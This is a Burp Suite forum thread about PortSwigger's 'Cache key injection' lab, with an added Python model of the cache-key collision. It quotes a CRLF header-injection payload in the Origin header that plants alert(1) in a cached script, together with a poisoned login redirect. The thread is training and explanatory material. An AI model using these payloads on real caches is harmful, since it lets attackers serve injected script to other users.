Burp Suite User Forum


Lab: Cache key injection

Ariel | Last updated: Feb 03, 2021 08:48PM UTC

Hi, I want to know why, on the JS page, the Origin header has four dollar signs and not two.

GET /js/localize.js?lang=en?utm_content=z&cors=1&x=1 HTTP/1.1
Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$

Uthman, PortSwigger Agent | Last updated: Feb 04, 2021 04:45PM UTC

Hi Ariel,

In this lab, the caching key has the following structure:

'path?query$$origin'

When we poison the cache on the 'js/localize.js' page with the Origin header, the caching key becomes:

'/js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$'

After that, we poison 'login?lang=en' so that it redirects to:

'/login/?lang=enx?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23'

and the '/js/localize.js' script is fetched with the same query. When the script is fetched after the redirection, since it is a same-origin request, the Origin header will be empty. So the actual key will be the redirection query + '$$' + (blank origin).

So the key will be the same:

'/js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$'

Hence we receive the poisoned response.
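
The key collision described in the reply above, as an added example that is not part of this thread and not the lab's own code. It models the cache-key scheme the reply states (path?query$$origin, with the utm_content parameter excluded) and checks why the Origin value has to end in four dollar signs rather than two. Two things are assumptions rather than facts from the thread: the 'Origin=' prefix on the header component is taken from the keys quoted in the reply, and the URL decoding the lab's cache applies to a query that arrives via the poisoned redirect is not modelled, so the second query is used exactly as the reply gives it. All function and constant names are hypothetical.

```python
import re

# Constructed model of the cache key scheme described in the reply:
#   key = path + "?" + query_without_utm_content + "$$" + origin_component
# ASSUMPTION: the origin component is "Origin=<header value>" when the
# request carries an Origin header and empty when it does not (this is
# read off the keys quoted in the reply, not confirmed by the lab).
# ASSUMPTION: utm_content is dropped by removing "utm_content=...&"
# textually from the query, which reproduces the quoted keyed query.
UTM_CONTENT_RE = re.compile(r"utm_content=[^&]*&?")


def cache_key(path, query, origin=None):
    """Return the modelled cache key; origin=None means no Origin header."""
    keyed_query = UTM_CONTENT_RE.sub("", query)
    origin_component = "" if origin is None else "Origin=" + origin
    return f"{path}?{keyed_query}$${origin_component}"


PATH = "/js/localize.js"
# The header-injection payload from the first post, without its trailing "$$$$".
PAYLOAD = "x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)"


def poisoning_key(trailer="$$$$"):
    """Key of the attacker's request: real query plus a crafted Origin header."""
    return cache_key(PATH, "lang=en?utm_content=z&cors=1&x=1", PAYLOAD + trailer)


def victim_key():
    """Key of the same-origin script fetch after the poisoned redirect.

    The query is taken as the reply states it after the cache has processed
    the redirect target; the browser sends no Origin header here, so the
    origin component is empty and only the "$$" separator is appended.
    """
    return cache_key(PATH, f"lang=en?cors=1&x=1$$Origin={PAYLOAD}$$", None)


def keys_collide(trailer="$$$$"):
    """True when a payload ending in `trailer` poisons the victim's key."""
    return poisoning_key(trailer) == victim_key()


if __name__ == "__main__":
    print("attacker:", poisoning_key())
    print("victim:  ", victim_key())
    print("collide with $$$$:", keys_collide("$$$$"))  # True
    print("collide with $$:  ", keys_collide("$$"))    # False
```

In the victim's request the two dollar signs inside the query are followed by the cache's own "$$" separator and an empty origin component, so the key ends in four; the attacker's Origin value sits after the separator and must therefore supply all four itself. With only two, the keys differ by the trailing "$$" and the poisoned entry is never served.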

Ariel | Last updated: Feb 07, 2021 01:27PM UTC

Thanks, it helps.
